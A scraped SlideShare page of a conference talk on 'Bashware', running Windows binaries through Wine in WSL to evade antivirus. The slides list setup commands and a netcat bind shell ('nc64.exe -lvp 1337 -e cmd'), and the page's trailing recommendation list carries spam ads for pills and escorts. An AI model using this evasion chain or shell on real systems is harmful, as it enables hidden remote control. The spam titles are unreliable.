SlideShare uma empresa Scribd logo

Executing Windows Malware through WSL (Bashware)

Transferir como PPTX, PDF
Riyaz Walikar
Riyaz Walikar

A quick talk on executing Windows binaries using Wine in WSL. This allows for a sort of hidden process execution.

Software
1 de 18
Bashware A malware execution technique
/usr/bin/who • null and OWASP Bangalore chapter leader • A decade of security experience in various technologies • Security researcher and evangelist • Speaker and trainer at several security conferences • https://ibreak.software • @riyazwalikar | @wincmdfu
What is Bashware? • A technique researched by Check Point Security that can be used by malware to run using the Windows Subsystem for Linux (WSL) and not be detected by security solutions (like AV etc.) • Basically a way to run PE executables using the WSL • Bash + (mal)ware
Back to Basics • How does malware (pick any) infect a Windows machine? • How is it detected? Any examples of detection techniques?
An overview of WSL • WSL is a collection of components that enables native Linux ELF64 binaries to run on Windows. It contains both user mode and kernel mode components. It is primarily comprised of: • User mode session manager service that handles the Linux instance life cycle • Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by translating Linux syscalls • Pico processes that host the unmodified user mode Linux (e.g. /bin/bash)
Demo of WSL
Bashware Video Demo • https://www.youtube.com/watch?v=fwEQFMbHIV8
Let’s build a PoC!
According to the video/blogpost • Enable WSL • Enable Developer mode • Install Linux components • Install WineHQ • Run Windows binary through Wine
Step 1: Enable WSL dism /Online /Enable-Feature /All /FeatureName:Microsoft- Windows-Subsystem-Linux /NoRestart Enable-WindowsOptionalFeature -O -F Microsoft-Windows- Subsystem-Linux
Step 2: Enable Developer mode • Set the following registry values [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionAppModelUnlock] "AllowAllTrustedApps"=dword:1 "AllowDevelopmentWithoutDevLicense"=dword:1
Step 3: Install Linux components • lxrun /install /y
Step 4: Install Wine dpkg --add-architecture i386 add-apt-repository -y ppa:ubuntu-wine/ppa apt-get update apt-get install wine1.6-amd64
Step 5: Run PE binary using wine wine64 nc64.exe -lvp 1337 -e cmd
Demo
• Riyaz Walikar • https://ibreak.software • @riyazwalikar | @wincmdfu
References • https://research.checkpoint.com/beware-bashware-new-method- malware-bypass-security-solutions/ • https://www.youtube.com/watch?v=fwEQFMbHIV8 • https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows- subsystem-for-linux-overview/ • https://ibreak.software/executing-windows-malware-in-windows- subsystem-for-linux-bashware/

Recomendados

An Introduction to Sysinternals
An Introduction to SysinternalsAn Introduction to Sysinternals
An Introduction to SysinternalsRiyaz Walikar
 
Windows Privilege Escalation
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege EscalationRiyaz Walikar
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahOWASP Delhi
 
Level Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege EscalationLevel Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege Escalationjakx_
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Linux privilege escalation 101
Linux privilege escalation 101Linux privilege escalation 101
Linux privilege escalation 101Rashid feroz
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalationnullthreat
 

Recomendados

An Introduction to Sysinternals
An Introduction to SysinternalsAn Introduction to Sysinternals
An Introduction to SysinternalsRiyaz Walikar
 
Windows Privilege Escalation
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege EscalationRiyaz Walikar
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahOWASP Delhi
 
Level Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege EscalationLevel Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege Escalationjakx_
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Linux privilege escalation 101
Linux privilege escalation 101Linux privilege escalation 101
Linux privilege escalation 101Rashid feroz
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalationnullthreat
 
Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalationJameel Nabbo
 
From zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows systemFrom zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows systemNabeel Ahmed
 
Using symfony to save time, effort and sanity
Using symfony to save time, effort and sanityUsing symfony to save time, effort and sanity
Using symfony to save time, effort and sanityJoshua May
 
J+s
J+sJ+s
J+shappyuk
 
WIndows Kernel-Land exploitation
WIndows Kernel-Land exploitationWIndows Kernel-Land exploitation
WIndows Kernel-Land exploitationkyaw thiha
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsBishop Fox
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
 
Device drivers Introduction
Device drivers IntroductionDevice drivers Introduction
Device drivers Introductionvijay selva
 
Hosting Open Source Projects at the OSUOSL
Hosting Open Source Projects at the OSUOSLHosting Open Source Projects at the OSUOSL
Hosting Open Source Projects at the OSUOSLOSU Open Source Lab
 
Day 2 Dns Cert 4c Malicious Use
Day 2 Dns Cert 4c Malicious UseDay 2 Dns Cert 4c Malicious Use
Day 2 Dns Cert 4c Malicious Usevngundi
 
PowerShell 2.0 remoting
PowerShell 2.0 remotingPowerShell 2.0 remoting
PowerShell 2.0 remotingRavikanth Chaganti
 
Course 101: Lecture 4: A Tour in RTOS Land
Course 101: Lecture 4: A Tour in RTOS Land Course 101: Lecture 4: A Tour in RTOS Land
Course 101: Lecture 4: A Tour in RTOS Land Ahmed El-Arabawy
 
Introduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interruptsIntroduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interruptsShivam Mitra
 
Buffer overflows
Buffer overflowsBuffer overflows
Buffer overflowsSandun Perera
 
Gnubs-pres-foss-cdac-sem
Gnubs-pres-foss-cdac-semGnubs-pres-foss-cdac-sem
Gnubs-pres-foss-cdac-semSagun Baijal
 
Embedded Systems: Lecture 5: A Tour in RTOS Land
Embedded Systems: Lecture 5: A Tour in RTOS LandEmbedded Systems: Lecture 5: A Tour in RTOS Land
Embedded Systems: Lecture 5: A Tour in RTOS LandAhmed El-Arabawy
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using MeterpreterShubham Mittal
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityJérôme Petazzoni
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon chinaPeter Hlavaty
 
How *NOT* to firmware
How *NOT* to firmwareHow *NOT* to firmware
How *NOT* to firmwareAmit Serper
 
Linux Server Security and Hardering
Linux Server Security and HarderingLinux Server Security and Hardering
Linux Server Security and Harderingvidalinux
 
What Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdfWhat Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdfBytecode Security
 

Mais conteúdo relacionado

Mais procurados

Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalationJameel Nabbo
 
From zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows systemFrom zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows systemNabeel Ahmed
 
Using symfony to save time, effort and sanity
Using symfony to save time, effort and sanityUsing symfony to save time, effort and sanity
Using symfony to save time, effort and sanityJoshua May
 
WIndows Kernel-Land exploitation
WIndows Kernel-Land exploitationWIndows Kernel-Land exploitation
WIndows Kernel-Land exploitationkyaw thiha
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsBishop Fox
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
 
Device drivers Introduction
Device drivers IntroductionDevice drivers Introduction
Device drivers Introductionvijay selva
 
Hosting Open Source Projects at the OSUOSL
Hosting Open Source Projects at the OSUOSLHosting Open Source Projects at the OSUOSL
Hosting Open Source Projects at the OSUOSLOSU Open Source Lab
 
Day 2 Dns Cert 4c Malicious Use
Day 2 Dns Cert 4c Malicious UseDay 2 Dns Cert 4c Malicious Use
Day 2 Dns Cert 4c Malicious Usevngundi
 
Course 101: Lecture 4: A Tour in RTOS Land
Course 101: Lecture 4: A Tour in RTOS Land Course 101: Lecture 4: A Tour in RTOS Land
Course 101: Lecture 4: A Tour in RTOS Land Ahmed El-Arabawy
 
Introduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interruptsIntroduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interruptsShivam Mitra
 
Gnubs-pres-foss-cdac-sem
Gnubs-pres-foss-cdac-semGnubs-pres-foss-cdac-sem
Gnubs-pres-foss-cdac-semSagun Baijal
 
Embedded Systems: Lecture 5: A Tour in RTOS Land
Embedded Systems: Lecture 5: A Tour in RTOS LandEmbedded Systems: Lecture 5: A Tour in RTOS Land
Embedded Systems: Lecture 5: A Tour in RTOS LandAhmed El-Arabawy
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using MeterpreterShubham Mittal
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityJérôme Petazzoni
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon chinaPeter Hlavaty
 
How *NOT* to firmware
How *NOT* to firmwareHow *NOT* to firmware
How *NOT* to firmwareAmit Serper
 

Mais procurados (20)

Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalation
 
From zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows systemFrom zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows system
 
Using symfony to save time, effort and sanity
Using symfony to save time, effort and sanityUsing symfony to save time, effort and sanity
Using symfony to save time, effort and sanity
 
J+s
J+sJ+s
J+s
 
WIndows Kernel-Land exploitation
WIndows Kernel-Land exploitationWIndows Kernel-Land exploitation
WIndows Kernel-Land exploitation
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation Methods
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
 
Device drivers Introduction
Device drivers IntroductionDevice drivers Introduction
Device drivers Introduction
 
Hosting Open Source Projects at the OSUOSL
Hosting Open Source Projects at the OSUOSLHosting Open Source Projects at the OSUOSL
Hosting Open Source Projects at the OSUOSL
 
Day 2 Dns Cert 4c Malicious Use
Day 2 Dns Cert 4c Malicious UseDay 2 Dns Cert 4c Malicious Use
Day 2 Dns Cert 4c Malicious Use
 
PowerShell 2.0 remoting
PowerShell 2.0 remotingPowerShell 2.0 remoting
PowerShell 2.0 remoting
 
Course 101: Lecture 4: A Tour in RTOS Land
Course 101: Lecture 4: A Tour in RTOS Land Course 101: Lecture 4: A Tour in RTOS Land
Course 101: Lecture 4: A Tour in RTOS Land
 
Introduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interruptsIntroduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interrupts
 
Buffer overflows
Buffer overflowsBuffer overflows
Buffer overflows
 
Gnubs-pres-foss-cdac-sem
Gnubs-pres-foss-cdac-semGnubs-pres-foss-cdac-sem
Gnubs-pres-foss-cdac-sem
 
Embedded Systems: Lecture 5: A Tour in RTOS Land
Embedded Systems: Lecture 5: A Tour in RTOS LandEmbedded Systems: Lecture 5: A Tour in RTOS Land
Embedded Systems: Lecture 5: A Tour in RTOS Land
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using Meterpreter
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and security
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
 
How *NOT* to firmware
How *NOT* to firmwareHow *NOT* to firmware
How *NOT* to firmware
 

Semelhante a Executing Windows Malware through WSL (Bashware)

Linux Server Security and Hardering
Linux Server Security and HarderingLinux Server Security and Hardering
Linux Server Security and Harderingvidalinux
 
What Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdfWhat Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdfBytecode Security
 
VCS, Containers & Low-code
VCS, Containers & Low-codeVCS, Containers & Low-code
VCS, Containers & Low-codeJoel Quintyn
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...B.A.
 
Linux for embedded_systems
Linux for embedded_systemsLinux for embedded_systems
Linux for embedded_systemsVandana Salve
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionNeel Pathak
 
Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...Kangaroot
 
InSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.beInSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.beMandi Walls
 
1 artem mygaiev - testing open-source software in embedded devices
1 artem mygaiev - testing open-source software in embedded devices1 artem mygaiev - testing open-source software in embedded devices
1 artem mygaiev - testing open-source software in embedded devicesIevgenii Katsan
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Sysdig
 
Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment isc2-hellenic
 
Version Control and Continuous Integration
Version Control and Continuous IntegrationVersion Control and Continuous Integration
Version Control and Continuous IntegrationGeff Henderson Chang
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013drewz lin
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022MichaelM85042
 
WTF my container just spawned a shell!
WTF my container just spawned a shell!WTF my container just spawned a shell!
WTF my container just spawned a shell!Sysdig
 
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B KuteUnit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B KuteTushar B Kute
 
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
Linx privx privileges-sudo misconfiguration group and docker daemon privilegesLinx privx privileges-sudo misconfiguration group and docker daemon privileges
Linx privx privileges-sudo misconfiguration group and docker daemon privilegesAliBawazeEer
 
Overview on Open Source Technology.pptx
Overview on Open Source Technology.pptxOverview on Open Source Technology.pptx
Overview on Open Source Technology.pptxDrRShaliniVISTAS
 

Semelhante a Executing Windows Malware through WSL (Bashware) (20)

Linux Server Security and Hardering
Linux Server Security and HarderingLinux Server Security and Hardering
Linux Server Security and Hardering
 
What Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdfWhat Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdf
 
Kali presentation
Kali presentationKali presentation
Kali presentation
 
VCS, Containers & Low-code
VCS, Containers & Low-codeVCS, Containers & Low-code
VCS, Containers & Low-code
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 
Linux for embedded_systems
Linux for embedded_systemsLinux for embedded_systems
Linux for embedded_systems
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
 
Linux
LinuxLinux
Linux
 
Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...
 
InSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.beInSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.be
 
1 artem mygaiev - testing open-source software in embedded devices
1 artem mygaiev - testing open-source software in embedded devices1 artem mygaiev - testing open-source software in embedded devices
1 artem mygaiev - testing open-source software in embedded devices
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
 
Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment
 
Version Control and Continuous Integration
Version Control and Continuous IntegrationVersion Control and Continuous Integration
Version Control and Continuous Integration
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
 
WTF my container just spawned a shell!
WTF my container just spawned a shell!WTF my container just spawned a shell!
WTF my container just spawned a shell!
 
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B KuteUnit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
 
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
Linx privx privileges-sudo misconfiguration group and docker daemon privilegesLinx privx privileges-sudo misconfiguration group and docker daemon privileges
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
 
Overview on Open Source Technology.pptx
Overview on Open Source Technology.pptxOverview on Open Source Technology.pptx
Overview on Open Source Technology.pptx
 

Último

WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrandmasabamasaba
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...WSO2
 
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...Jittipong Loespradit
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...masabamasaba
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfkalichargn70th171
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...masabamasaba
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech studentsHimanshiGarg82
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnAmarnathKambale
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...masabamasaba
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfonteinmasabamasaba
 
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in sowetomasabamasaba
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesVictorSzoltysek
 
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024VictoriaMetrics
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrainmasabamasaba
 
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareAnnouncing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareJim McKeeth
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...SelfMade bd
 

Último (20)

CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
 
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
